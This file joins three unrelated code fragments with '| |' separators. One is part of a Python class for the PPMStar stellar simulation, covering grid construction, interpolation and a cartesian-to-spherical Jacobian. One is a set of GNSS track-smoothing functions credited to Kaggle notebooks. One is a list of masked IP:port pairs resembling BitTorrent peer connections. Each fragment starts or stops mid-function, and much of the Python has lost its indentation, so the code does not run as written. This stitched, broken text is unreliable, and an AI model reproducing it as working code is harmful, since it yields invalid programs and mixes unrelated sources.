# ok all is good, set our flag that everything is good
self._sgrid_exists = True
return True
else:
return True
def _get_mgrid(self):
'''
Constructs the PPMStar mollweide spherical coordinates grid
Returns
-------
Boolean
True on success.
False on failure.
'''
# check if we already have this in memory or not
if not self._mollweide_exists:
# ok we now check to see if spherical coordinates has been made or not
if not self._sgrid_exists:
self._get_sgrid()
# we have a transform method, let's use it
self._mollweide_theta, self._mollweide_phi = self._transform_mollweide(self._theta.copy(),
self._phi.copy())
# DS: I will save this code, it may be used in the future
# and is a nice way of calculating this directly
# # we have the radius already, need theta and phi
# self._mollweide_theta = np.arctan2(self._zc,np.sqrt(np.power(self._xc,2.0) + np.power(self._yc,2.0)))
# # with phi we have a problem with the way np.arctan2 works, we get negative
# # angles in quadrants 3 and 4. This is what we want
# self._mollweide_phi = np.arctan2(self._yc,self._xc)
# in some cases, it is more convenient to work with xc[z,y,x] so lets store views
self._mollweide_theta_view = self._mollweide_theta.view()
self._mollweide_theta_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
self._mollweide_phi_view = self._mollweide_phi.view()
self._mollweide_phi_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
# ok all is good, set our flag that everything is good
self._mollweide_exists = True
return True
else:
return True
def _get_interpolation(self, var, igrid, method):
'''
This function controls which method of interpolation is used and how it is done.
Parameters
----------
var: np.ndarray
The quantity on the grid
igrid: np.ndarray
The array that contains all of the points that are to be interpolated to
igrid.shape = [ninterpolation_points,3]
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
Returns
-------
var_interp: np.ndarray
The var interpolated onto the 'igrid' points
'''
# what method?
# trilinear
if method == self._interpolation_methods[0]:
# first we create interpolation object from scipy
linear_interp = scipy.interpolate.RegularGridInterpolator(
(self._unique_coord, self._unique_coord, self._unique_coord), var)
# we have a "flattened" in radii igrid, just pass all arguments to the interpolator
var_interp = linear_interp(igrid)
# we will exit here
return var_interp
# moments
else:
# before I begin, are there any igrid values that are on the boundary or outside of it
upper_bound = np.max(self._unique_coord) - 1/2. * np.mean(np.abs(np.diff(self._unique_coord)))
lower_bound = np.min(self._unique_coord) + 1/2. * np.mean(np.abs(np.diff(self._unique_coord)))
# I will count zeros
out_of_bounds = np.logical_or((igrid > upper_bound),(igrid < lower_bound))
if np.count_nonzero(out_of_bounds.flatten()) > 0:
err = 'There are {:d} grid points that are at or outside of the boundary of the simulation'\
.format(np.count_nonzero(out_of_bounds.flatten()))
self._messenger.error(err)
raise ValueError
# first find the indices that have the closest igrid to our unique coordinates
# store the indexes
x_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
y_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
z_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
# find the index of unique coord that is closest to igrid values
x_idx = np.searchsorted(self._unique_coord,igrid[:,2])
y_idx = np.searchsorted(self._unique_coord,igrid[:,1])
z_idx = np.searchsorted(self._unique_coord,igrid[:,0])
# np.searchsorted finds the index to the "right" (in value) of each igrid point. However, we need the index
# that each igrid point is closest to for appropriate interpolation. This corrects for that
x_idx[np.where((self._unique_coord[x_idx] - igrid[:,2]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
y_idx[np.where((self._unique_coord[y_idx] - igrid[:,1]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
z_idx[np.where((self._unique_coord[z_idx] - igrid[:,0]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
# now we call the actual interpolation
var_interp = self._interpolation_moments(var, igrid, x_idx, y_idx, z_idx)
return var_interp
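# Illustrative sketch (not part of the class): the 'trilinear' branch above is a thin wrapper
# around scipy.interpolate.RegularGridInterpolator. A standalone equivalent, with stand-in
# names for the grid and field, would look roughly like:
#   coord = np.linspace(-1., 1., 8)                        # stand-in for self._unique_coord
#   field = np.random.rand(8, 8, 8)                        # stand-in for var[z, y, x]
#   interp = scipy.interpolate.RegularGridInterpolator((coord, coord, coord), field)
#   igrid = np.array([[0.0, 0.1, -0.2], [0.3, 0.3, 0.3]])  # rows are (z, y, x) points
#   values = interp(igrid)                                 # shape (2,)
# The 'moments' branch instead snaps each point to its nearest cell via np.searchsorted and
# delegates to self._interpolation_moments, which is defined elsewhere in this class.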
def _get_jacobian(self, x, y, z, r):
'''
This function creates the Jacobian to convert quantities defined in cartesian
coordinates to spherical coordinates. This is a very large array of
9 x self.moms_gridresolution which will be stored in memory. It is defined as the "physics"
spherical coordinates so the array has rhat, theta-hat, phi-hat -> xhat, yhat, zhat
Parameters
----------
x: np.ndarray
The x coordinates of the grid
y: np.ndarray
The y coordinates of the grid
z: np.ndarray
The z coordinates of the grid
r: np.ndarray
The r coordinates of the grid
Returns
-------
jacobian: np.ndarray
The jacobian for the transformation between cartesian and spherical coordinates
'''
# are we working with a flattened, (x,y,z) or a matrix?
if len(x.shape) > 1:
# since we work in spherical coordinates, the phi-hat dot z-hat component is zero, so it is 8x(nxnxn)
jacobian = np.zeros((8, x.shape[0], y.shape[0], z.shape[0]),dtype='float32')
else:
# since we work in spherical coordinates, the phi-hat dot z-hat component is zero, so it is 8x(n)
jacobian = np.zeros((8, x.shape[0]))
# need the cylindrical radius
rcyl = np.sqrt(np.power(x,2.0) + np.power(y,2.0))
# rhat -> xhat, yhat, zhat
np.divide(x,r,out=jacobian[0])
np.divide(y,r,out=jacobian[1])
np.divide(z,r,out=jacobian[2])
# theta-hat -> xhat, yhat, zhat
# we use "placeholders" of jacobian slots to not make new memory
np.divide(np.multiply(x, z, out=jacobian[3]), np.multiply(r, rcyl, out=jacobian[4]),
out = jacobian[3])
np.divide(np.multiply(y, z, out=jacobian[4]), np.multiply(r, rcyl, out=jacobian[5]),
out = jacobian[4])
np.divide(-rcyl, r, out=jacobian[5])
# phi-hat -> xhat, yhat, zhat
np.divide(-y, rcyl, out=jacobian[6])
np.divide(x, rcyl, out=jacobian[7])
# phi-hat dot z-hat = 0
# jacobian transformation matrix has been computed
return jacobian
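# For reference, the rows filled above are the usual spherical unit vectors expressed in the
# cartesian basis (with rcyl = sqrt(x^2 + y^2)):
#   r-hat     = ( x/r,          y/r,          z/r    )  -> jacobian[0..2]
#   theta-hat = ( x*z/(r*rcyl), y*z/(r*rcyl), -rcyl/r )  -> jacobian[3..5]
#   phi-hat   = (-y/rcyl,       x/rcyl,       0      )  -> jacobian[6..7], z-component omitted
# so e.g. a radial velocity is recovered as v_r = jacobian[0]*vx + jacobian[1]*vy + jacobian[2]*vz,
# and each unit vector has norm 1 wherever rcyl > 0.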
def _get(self, varloc, fname=None):
'''
Returns the variable var which is referenced with varloc at a specific dump/time in the
simulation. This is used internally for var requests whose references are local to a method and
garbage collected afterwards. IMPORTANT: The arrays are NOT flattened, but if they need
to be, a NEW array will be made
Parameters
----------
varloc: str, int
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
var: np.ndarray
Variable on the grid
'''
# if fname is None, use current dump
if fname == None:
fname = self.what_dump_am_i
# quick check if we already have the momsdata in memory
if str(fname) in self._many_momsdata:
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)])
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
else:
# grab a new datacube. This updates self._momsdata.data
self._get_dump(fname)
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)])
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
# def get_ray_interpolation(self, radius, theta, phi, nrays):
# """
# """
def get_dump_list(self):
'''
Returns a list of dumps available.
Returns
-------
dumps: list
List of dumps that are available
'''
return list(self._dumps)
def get_interpolation(self, varloc, igrid, fname=None, method='trilinear', logvar=False):
'''
Returns the interpolated array of values (with a particular method) of the var given by
'varloc' at the [z,y,x] grid points of igrid
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
np.ndarray: quantity you want to have interpolated on the grid
igrid: np.ndarray
The array that contains all of the points that are to be interpolated to
igrid.shape = [ninterpolation_points,3]
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
fname: None, int
None: default option, will grab current dump
int: Dump number
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
logvar: bool
If True, interpolate on var = np.log10(var) for better fitting. The returned var_interp
will be scaled back to linear
Returns
-------
var_interp: np.ndarray
The var interpolated onto the 'igrid' points
'''
# first check if we have a np.ndarray or not
if isinstance(varloc, np.ndarray):
# for consistency of naming..
var = varloc
# check if it is the same shape | |
import copy
import warnings
from typing import List
import numpy as np
import pandas as pd
import scipy
import simdkalman
from numpy.fft import irfft, rfft, rfftfreq
from scipy.interpolate import interp1d
from scipy.ndimage import gaussian_filter1d
from tqdm import tqdm
from src.postprocess.metric import calc_haversine
warnings.filterwarnings("ignore")
def apply_kf_smoothing(df: pd.DataFrame) -> pd.DataFrame:
"""
from https://www.kaggle.com/emaerthin/demonstration-of-the-kalman-filter
"""
def _get_kalman_filter() -> simdkalman.KalmanFilter:
T = 1.0
state_transition = np.array(
[
[1, 0, T, 0, 0.5 * T ** 2, 0],
[0, 1, 0, T, 0, 0.5 * T ** 2],
[0, 0, 1, 0, T, 0],
[0, 0, 0, 1, 0, T],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
]
)
process_noise = (
np.diag([1e-5, 1e-5, 5e-6, 5e-6, 1e-6, 1e-6]) + np.ones((6, 6)) * 1e-9
)
observation_model = np.array([[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]])
observation_noise = np.diag([5e-5, 5e-5]) + np.ones((2, 2)) * 1e-9
kf = simdkalman.KalmanFilter(
state_transition=state_transition,
process_noise=process_noise,
observation_model=observation_model,
observation_noise=observation_noise,
)
return kf
kf_ = _get_kalman_filter()
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in tqdm(unique_paths):
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
data = df[cond][["latDeg", "lngDeg"]].to_numpy()
data = data.reshape(1, len(data), 2)
smoothed = kf_.smooth(data)
df.loc[cond, "latDeg"] = smoothed.states.mean[0, :, 0]
df.loc[cond, "lngDeg"] = smoothed.states.mean[0, :, 1]
return df
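# Illustrative usage sketch, not from the referenced notebook: `apply_kf_smoothing` expects one
# row per epoch with `collectionName`, `phoneName`, `latDeg` and `lngDeg` columns, and the filter
# above models a constant-acceleration state [lat, lng, v_lat, v_lng, a_lat, a_lng] with a fixed
# step T = 1. The helper below builds a tiny synthetic track just to show the expected input.
def _example_apply_kf_smoothing() -> pd.DataFrame:
    """Smooth a small noisy synthetic track. Purely for illustration."""
    rng = np.random.default_rng(0)
    n = 50
    df = pd.DataFrame(
        {
            "collectionName": ["demo-collection"] * n,
            "phoneName": ["Pixel4"] * n,
            "latDeg": 37.0 + np.linspace(0.0, 1e-3, n) + rng.normal(0.0, 1e-5, n),
            "lngDeg": -122.0 + np.linspace(0.0, 1e-3, n) + rng.normal(0.0, 1e-5, n),
        }
    )
    return apply_kf_smoothing(df)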
def filter_outlier(df: pd.DataFrame, one_direction: bool = False) -> pd.DataFrame:
"""
https://www.kaggle.com/dehokanta/baseline-post-processing-by-outlier-correction
"""
df["dist_pre"] = 0
df["dist_pro"] = 0
df["latDeg_pre"] = df["latDeg"].shift(periods=1, fill_value=0)
df["lngDeg_pre"] = df["lngDeg"].shift(periods=1, fill_value=0)
df["latDeg_pro"] = df["latDeg"].shift(periods=-1, fill_value=0)
df["lngDeg_pro"] = df["lngDeg"].shift(periods=-1, fill_value=0)
df["dist_pre"] = calc_haversine(df.latDeg_pre, df.lngDeg_pre, df.latDeg, df.lngDeg)
df["dist_pro"] = calc_haversine(df.latDeg, df.lngDeg, df.latDeg_pro, df.lngDeg_pro)
# start, end fix
list_phone = df["phone"].unique()
for phone in list_phone:
ind_s = df[df["phone"] == phone].index[0]
ind_e = df[df["phone"] == phone].index[-1]
df.loc[ind_s, "dist_pre"] = 0
df.loc[ind_e, "dist_pro"] = 0
# ~95th percentile threshold, approximated here as mean + 2 * std
pro_95 = df["dist_pro"].mean() + (df["dist_pro"].std() * 2)
pre_95 = df["dist_pre"].mean() + (df["dist_pre"].std() * 2)
# find outlier data
if one_direction:
targets = ["latDeg", "lngDeg"]
dfs = []
for phone, df_ in df.groupby("phone"):
pre_mask = df_["dist_pre"].to_numpy() > pre_95
pre_mask[:-1] += pre_mask[1:]
deg_preds_filtered = copy.deepcopy(df_.loc[~pre_mask][targets].to_numpy())
T_ref_filtered = copy.deepcopy(
df_.loc[~pre_mask]["millisSinceGpsEpoch"].to_numpy()
)
deg_preds = scipy.interpolate.interp1d(
T_ref_filtered,
deg_preds_filtered,
axis=0,
bounds_error=None,
fill_value="extrapolate",
assume_sorted=True,
)(df_["millisSinceGpsEpoch"].to_numpy())
df_.loc[:, targets] = deg_preds
dfs.append(df_)
df = pd.concat(dfs, axis=0)
else:
ind = df[(df["dist_pro"] > pro_95) & (df["dist_pre"] > pre_95)][
["dist_pre", "dist_pro"]
].index
# smoothing
for i in ind:
df.loc[i, "latDeg"] = (
df.loc[i - 1, "latDeg"] + df.loc[i + 1, "latDeg"]
) / 2
df.loc[i, "lngDeg"] = (
df.loc[i - 1, "lngDeg"] + df.loc[i + 1, "lngDeg"]
) / 2
return df
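# Worked example of the threshold above (illustrative numbers): if the per-epoch distances to the
# previous fix have mean 3.0 m and std 2.0 m, then pre_95 = 3.0 + 2 * 2.0 = 7.0 m. An epoch whose
# distance to *both* neighbours exceeds the respective threshold is treated as an outlier and, in
# the default two-sided mode, replaced by the midpoint of its neighbours:
#   latDeg[i] = (latDeg[i-1] + latDeg[i+1]) / 2, and likewise for lngDeg.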
def filter_outlier_with_absloute(
df: pd.DataFrame, max_velocity: float = 45.0, max_acc: float = 10.0
) -> pd.DataFrame:
df["dist_pre"] = 0
df["dist_pro"] = 0
df["latDeg_pre"] = df["latDeg"].shift(periods=1, fill_value=0)
df["lngDeg_pre"] = df["lngDeg"].shift(periods=1, fill_value=0)
df["latDeg_pro"] = df["latDeg"].shift(periods=-1, fill_value=0)
df["lngDeg_pro"] = df["lngDeg"].shift(periods=-1, fill_value=0)
df["dist_pre"] = calc_haversine(df.latDeg_pre, df.lngDeg_pre, df.latDeg, df.lngDeg)
df["dist_pro"] = calc_haversine(df.latDeg, df.lngDeg, df.latDeg_pro, df.lngDeg_pro)
# start, end fix
list_phone = df["phone"].unique()
for phone in list_phone:
ind_s = df[df["phone"] == phone].index[0]
ind_e = df[df["phone"] == phone].index[-1]
df.loc[ind_s, "dist_pre"] = 0
df.loc[ind_e, "dist_pro"] = 0
# ~95th percentile thresholds (kept for reference; the absolute limits below are used instead)
# pro_95 = df["dist_pro"].mean() + (df["dist_pro"].std() * 2)
# pre_95 = df["dist_pre"].mean() + (df["dist_pre"].std() * 2)
# find outlier data
ind = df[(df["dist_pro"] > max_velocity) & (df["dist_pre"] > max_velocity)][
["dist_pre", "dist_pro"]
].index
# smoothing
for i in ind:
df.loc[i, "latDeg"] = (df.loc[i - 1, "latDeg"] + df.loc[i + 1, "latDeg"]) / 2
df.loc[i, "lngDeg"] = (df.loc[i - 1, "lngDeg"] + df.loc[i + 1, "lngDeg"]) / 2
return df
def make_lerp_data(df: pd.DataFrame):
"""
Generate interpolated lat,lng values for
different phone times in the same collection.
from https://www.kaggle.com/t88take/gsdc-phones-mean-prediction
"""
org_columns = df.columns
# Generate a combination of time x collection x phone and
# combine it with the original data (generate records to be interpolated)
assert (
len(
df[
df.duplicated(
["collectionName", "millisSinceGpsEpoch", "phoneName"], keep=False
)
]
)
== 0
)
assert (
len(df[df.duplicated(["collectionName", "millisSinceGpsEpoch"], keep=False)])
> 0
), "there are multiple phone at the same obsevation"
time_list = df[["collectionName", "millisSinceGpsEpoch"]].drop_duplicates()
phone_list = df[["collectionName", "phoneName"]].drop_duplicates()
# assert len(phone_list == 73), "all folders for phones equal 73"
# each timestep row = # of unique phone
tmp = time_list.merge(phone_list, on="collectionName", how="outer")
# different phones, e.g. Pixel 4 and 4XLModded, have different timesteps,
# so there are lots of NaNs after the merge,
# and those are the targets to be interpolated with the other available data.
lerp_df = tmp.merge(
df, on=["collectionName", "millisSinceGpsEpoch", "phoneName"], how="left"
)
lerp_df["phone"] = lerp_df["collectionName"] + "_" + lerp_df["phoneName"]
lerp_df = lerp_df.sort_values(["phone", "millisSinceGpsEpoch"])
# linear interpolation
lerp_df["latDeg_prev"] = lerp_df["latDeg"].shift(1)
lerp_df["latDeg_next"] = lerp_df["latDeg"].shift(-1)
lerp_df["lngDeg_prev"] = lerp_df["lngDeg"].shift(1)
lerp_df["lngDeg_next"] = lerp_df["lngDeg"].shift(-1)
lerp_df["phone_prev"] = lerp_df["phone"].shift(1)
lerp_df["phone_next"] = lerp_df["phone"].shift(-1)
lerp_df["time_prev"] = lerp_df["millisSinceGpsEpoch"].shift(1)
lerp_df["time_next"] = lerp_df["millisSinceGpsEpoch"].shift(-1)
# Leave only records to be interpolated, nan & non_first, non_last data
lerp_df = lerp_df[
(lerp_df["latDeg"].isnull())
& (lerp_df["phone"] == lerp_df["phone_prev"])
& (lerp_df["phone"] == lerp_df["phone_next"])
].copy()
# calc lerp, velocity x delta(time)
lerp_df["latDeg"] = lerp_df["latDeg_prev"] + (
(lerp_df["latDeg_next"] - lerp_df["latDeg_prev"])
* (
(lerp_df["millisSinceGpsEpoch"] - lerp_df["time_prev"])
/ (lerp_df["time_next"] - lerp_df["time_prev"])
)
)
lerp_df["lngDeg"] = lerp_df["lngDeg_prev"] + (
(lerp_df["lngDeg_next"] - lerp_df["lngDeg_prev"])
* (
(lerp_df["millisSinceGpsEpoch"] - lerp_df["time_prev"])
/ (lerp_df["time_next"] - lerp_df["time_prev"])
)
)
# Leave only the data that has a complete set of previous and next data.
lerp_df = lerp_df[~lerp_df["latDeg"].isnull()]
return lerp_df[org_columns]
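# Worked example of the interpolation above: with time_prev = 1000, time_next = 3000 and a target
# millisSinceGpsEpoch of 1500, the blend factor is (1500 - 1000) / (3000 - 1000) = 0.25, so
#   latDeg = latDeg_prev + 0.25 * (latDeg_next - latDeg_prev)
# i.e. plain linear interpolation between the two surrounding fixes of the same phone.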
def calc_mean_pred(df: pd.DataFrame):
"""
Make a prediction based on the average of the predictions of phones
in the same collection.
from https://www.kaggle.com/t88take/gsdc-phones-mean-prediction
"""
lerp_df = make_lerp_data(df=df)
add_lerp = pd.concat([df, lerp_df])
# each time step == only one row; average latDeg,
# lngDeg over all phones at each time step
# e.g. mean(original Deg of Pixel4 and Deg of 4XLModded interpolated with `make_lerp_data`)
mean_pred_result = (
add_lerp.groupby(["collectionName", "millisSinceGpsEpoch"])[
["latDeg", "lngDeg"]
]
.mean()
.reset_index()
)
base_cols = ["collectionName", "phoneName", "phone", "millisSinceGpsEpoch"]
try:
mean_pred_df = df[base_cols + ["latDeg_gt", "lngDeg_gt", "speedMps"]].copy()
except Exception:
mean_pred_df = df[base_cols].copy()
mean_pred_df = mean_pred_df.merge(
mean_pred_result[["collectionName", "millisSinceGpsEpoch", "latDeg", "lngDeg"]],
on=["collectionName", "millisSinceGpsEpoch"],
how="left",
)
return mean_pred_df
def get_removedevice(
input_df: pd.DataFrame, divece: str = "SamsungS20Ultra"
) -> pd.DataFrame:
"""
from
https://www.kaggle.com/columbia2131/device-eda-interpolate-by-removing-device-en-ja
"""
input_df["index"] = input_df.index
input_df = input_df.sort_values("millisSinceGpsEpoch")
input_df.index = input_df["millisSinceGpsEpoch"].values
output_df = pd.DataFrame()
for _, subdf in input_df.groupby("collectionName"):
phones = subdf["phoneName"].unique()
if (len(phones) == 1) or (divece not in phones):
output_df = pd.concat([output_df, subdf])
continue
origin_df = subdf.copy()
_index = subdf["phoneName"] == divece
subdf.loc[_index, "latDeg"] = np.nan
subdf.loc[_index, "lngDeg"] = np.nan
subdf = subdf.interpolate(method="index", limit_area="inside")
_index = subdf["latDeg"].isnull()
subdf.loc[_index, "latDeg"] = origin_df.loc[_index, "latDeg"].values
subdf.loc[_index, "lngDeg"] = origin_df.loc[_index, "lngDeg"].values
output_df = pd.concat([output_df, subdf])
output_df.index = output_df["index"].values
output_df = output_df.sort_index()
del output_df["index"]
return output_df
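# Illustrative note on the function above: because the frame is indexed by millisSinceGpsEpoch
# when interpolate() is called, setting the target device's rows to NaN and using
# method="index", limit_area="inside" fills those rows from the *other* phones of the same
# collection; anything still NaN afterwards (e.g. at the edges) is restored from the original
# predictions.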
def fft_filter_signal(signal: np.ndarray, threshold: float = 1e8) -> np.ndarray:
orig_len = signal.shape[0]
fourier = rfft(signal)
frequencies = rfftfreq(signal.size, d=20e-3 / signal.size)
fourier[frequencies > threshold] = 0
filtered = irfft(fourier)
reduced = orig_len - filtered.shape[0]
if reduced > 0:
filtered = np.concatenate([filtered] + [filtered[-reduced:]])
return filtered
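# Illustrative usage sketch, not from the referenced notebooks: `fft_filter_signal` zeroes every
# rfft coefficient whose mapped frequency exceeds `threshold` and inverts the transform, i.e. a
# crude low-pass filter. Note the mapping uses d = 20e-3 / signal.size, so bin k is always scored
# as k / 0.02 = 50 * k regardless of the real sampling rate; the original length is preserved by
# padding with the last values when irfft returns a shorter array.
def _example_fft_filter() -> np.ndarray:
    """Low-pass a ramp plus a fast oscillation. Purely for illustration."""
    n = 256
    t = np.linspace(0.0, 1.0, n, endpoint=False)
    noisy = t + 0.05 * np.sin(2 * np.pi * 40 * t)  # 40 cycles across the window -> bin k = 40
    # a threshold of 1000 keeps bins k <= 20 (50 * 20 = 1000) and removes the 40-cycle component
    return fft_filter_signal(noisy, threshold=1000.0)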
def apply_fft_filtering(
df: pd.DataFrame, threshold: float = 1e8, targets: List[str] = ["latDeg", "lngDeg"]
) -> pd.DataFrame:
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in tqdm(unique_paths):
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
for target in targets:
df.loc[cond, target] = fft_filter_signal(
signal=df.loc[cond, target].fillna(0).values, threshold=threshold
)
return df
def apply_gauss_smoothing(df, params):
"""
from https://www.kaggle.com/bpetrb/adaptive-gauss-phone-mean
"""
SZ_1 = params["sz_1"]
SZ_2 = params["sz_2"]
SZ_CRIT = params["sz_crit"]
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in unique_paths:
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
data = df[cond][["latDeg", "lngDeg"]].to_numpy()
lat_g1 = gaussian_filter1d(data[:, 0], np.sqrt(SZ_1))
lon_g1 = gaussian_filter1d(data[:, 1], np.sqrt(SZ_1))
lat_g2 = gaussian_filter1d(data[:, 0], np.sqrt(SZ_2))
lon_g2 = gaussian_filter1d(data[:, 1], np.sqrt(SZ_2))
lat_dif = data[1:, 0] - data[:-1, 0]
lon_dif = data[1:, 1] - data[:-1, 1]
lat_crit = np.append(
np.abs(
gaussian_filter1d(lat_dif, np.sqrt(SZ_CRIT))
/ (1e-9 + gaussian_filter1d(np.abs(lat_dif), np.sqrt(SZ_CRIT)))
),
[0],
)
lon_crit = np.append(
np.abs(
gaussian_filter1d(lon_dif, np.sqrt(SZ_CRIT))
/ (1e-9 + gaussian_filter1d(np.abs(lon_dif), np.sqrt(SZ_CRIT)))
),
[0],
)
df.loc[cond, "latDeg"] = lat_g1 * lat_crit + lat_g2 * (1.0 - lat_crit)
df.loc[cond, "lngDeg"] = lon_g1 * lon_crit + lon_g2 * (1.0 - lon_crit)
return df
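# Illustrative usage (parameter values below are placeholders, not claimed to be the tuned ones):
#   df = apply_gauss_smoothing(df, params={"sz_1": 0.85, "sz_2": 5.65, "sz_crit": 1.5})
# Per point, `lat_crit`/`lon_crit` are close to 1 where consecutive differences keep a consistent
# sign (steady motion) and close to 0 where they cancel out (jitter), so the result favours the
# lightly smoothed signal (sz_1) in the first case and the heavier smoothing (sz_2) in the second,
# assuming sz_1 < sz_2.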
def mean_with_other_phones(df):
"""
from https://www.kaggle.com/bpetrb/adaptive-gauss-phone-mean
"""
collections_list = df[["collectionName"]].drop_duplicates().to_numpy()
for collection in collections_list:
phone_list = (
df[df["collectionName"].to_list() == collection][["phoneName"]]
.drop_duplicates()
.to_numpy()
)
phone_data = {}
corrections = {}
for phone in phone_list:
cond = np.logical_and(
df["collectionName"] == collection[0], df["phoneName"] == phone[0]
).to_list()
phone_data[phone[0]] = df[cond][
["millisSinceGpsEpoch", "latDeg", "lngDeg"]
].to_numpy()
for current in phone_data:
correction = | |
data=[('172.16.17.32:40945', '172.16.31.10:6881'),
('172.16.17.32:40945', '192.168.3.11:6889'),
('172.16.17.32:40945', '172.16.17.32:6881'),
('172.16.17.32:40945', '172.16.58.3:50321'),
('172.16.17.32:40945', '172.16.17.32:51913'),
('172.16.17.32:40945', '172.16.58.3:42371'),
('172.16.17.32:40945', '192.168.127.12:40295'),
('172.16.17.32:40945', '192.168.127.12:6881'),
('192.168.3.11:21129', '172.16.58.3:1024'),
('192.168.3.11:21129', '192.168.127.12:6881'),
('192.168.3.11:21129', '192.168.127.12:39329'),
('192.168.3.11:21129', '172.16.58.3:7176'),
('192.168.3.11:21129', '172.16.31.10:51483'),
('192.168.3.11:21129', '172.16.17.32:51500'),
('192.168.3.11:21129', '172.16.17.32:2054'),
('192.168.3.11:21129', '172.16.58.3:60111'),
('172.16.58.3:44457', '192.168.3.11:8935'),
('172.16.58.3:44457', '172.16.17.32:50321'),
('172.16.58.3:44457', '172.16.31.10:51423'),
('172.16.58.3:44457', '172.16.58.3:49818'),
('172.16.58.3:44457', '172.16.17.32:50321'),
('172.16.58.3:44457', '172.16.58.3:6881'),
('172.16.58.3:44457', '172.16.58.3:31939'),
('172.16.58.3:44457', '172.16.17.32:1028'),
('172.16.17.32:6889', '172.16.58.3:49157'),
('172.16.17.32:6889', '172.16.17.32:6944'),
('172.16.17.32:6889', '192.168.3.11:6881'),
('172.16.17.32:6889', '192.168.127.12:52152'),
('172.16.17.32:6889', '172.16.17.32:3074'),
('172.16.17.32:6889', '192.168.127.12:55607'),
('172.16.17.32:6889', '192.168.3.11:8999'),
('172.16.17.32:6889', '172.16.17.32:51413'),
('192.168.127.12:12979', '192.168.127.12:30619'),
('192.168.127.12:12979', '172.16.58.3:51413'),
('192.168.127.12:12979', '172.16.31.10:61425'),
('192.168.127.12:12979', '172.16.58.3:26085'),
('192.168.127.12:12979', '172.16.17.32:13715'),
('192.168.127.12:12979', '192.168.3.11:61418'),
('192.168.127.12:12979', '192.168.3.11:8999'),
('192.168.127.12:12979', '192.168.127.12:49165'),
('192.168.3.11:58969', '172.16.58.3:25127'),
('192.168.3.11:58969', '172.16.31.10:6907'),
('192.168.3.11:58969', '172.16.31.10:6977'),
('192.168.3.11:58969', '172.16.17.32:51434'),
('192.168.3.11:58969', '172.16.58.3:52000'),
('192.168.3.11:58969', '192.168.127.12:6889'),
('192.168.3.11:58969', '172.16.58.3:46920'),
('192.168.3.11:58969', '172.16.58.3:6986'),
('172.16.31.10:41058', '172.16.17.32:35054'),
('172.16.31.10:41058', '172.16.31.10:6933'),
('172.16.31.10:41058', '172.16.17.32:35201'),
('172.16.31.10:41058', '172.16.17.32:6906'),
('172.16.31.10:41058', '172.16.31.10:38057'),
('172.16.31.10:41058', '192.168.127.12:8950'),
('172.16.31.10:41058', '172.16.17.32:8742'),
('172.16.31.10:41058', '172.16.58.3:48656'),
('172.16.58.3:40967', '192.168.127.12:8999'),
('172.16.58.3:40967', '172.16.31.10:51811'),
('172.16.58.3:40967', '172.16.31.10:6881'),
('172.16.58.3:40967', '172.16.31.10:65002'),
('172.16.58.3:40967', '192.168.3.11:6889'),
('172.16.58.3:40967', '172.16.58.3:49001'),
('172.16.58.3:40967', '172.16.58.3:51413'),
('172.16.58.3:40967', '172.16.17.32:43584'),
('172.16.31.10:6889', '172.16.31.10:6935'),
('172.16.31.10:6889', '172.16.17.32:51504'),
('172.16.31.10:6889', '172.16.17.32:51505'),
('172.16.31.10:6889', '172.16.31.10:51247'),
('172.16.31.10:6889', '192.168.127.12:31321'),
('172.16.31.10:6889', '192.168.127.12:31384'),
('172.16.31.10:6889', '172.16.58.3:51233'),
('172.16.31.10:6889', '172.16.58.3:59214'),
('172.16.17.32:6881', '172.16.17.32:6881'),
('172.16.17.32:6881', '192.168.127.12:20008'),
('172.16.17.32:6881', '172.16.31.10:63644'),
('172.16.17.32:6881', '172.16.58.3:8999'),
('172.16.17.32:6881', '192.168.3.11:8999'),
('172.16.17.32:6881', '192.168.3.11:6882'),
('172.16.17.32:6881', '172.16.17.32:6881'),
('172.16.17.32:6881', '172.16.58.3:31873'),
('172.16.17.32:9806', '192.168.127.12:28058'),
('172.16.17.32:9806', '192.168.3.11:50321'),
('172.16.17.32:9806', '172.16.58.3:7176'),
('172.16.17.32:9806', '192.168.127.12:31339'),
('172.16.17.32:9806', '192.168.127.12:51507'),
('172.16.17.32:9806', '172.16.58.3:46921'),
('172.16.17.32:9806', '172.16.58.3:57940'),
('172.16.17.32:9806', '172.16.31.10:30001'),
('1.64.65.66:25512', '192.168.127.12:51413'),
('1.64.65.66:25512', '192.168.3.11:45577'),
('1.64.65.66:25512', '172.16.17.32:3074'),
('1.64.65.66:25512', '192.168.3.11:26603'),
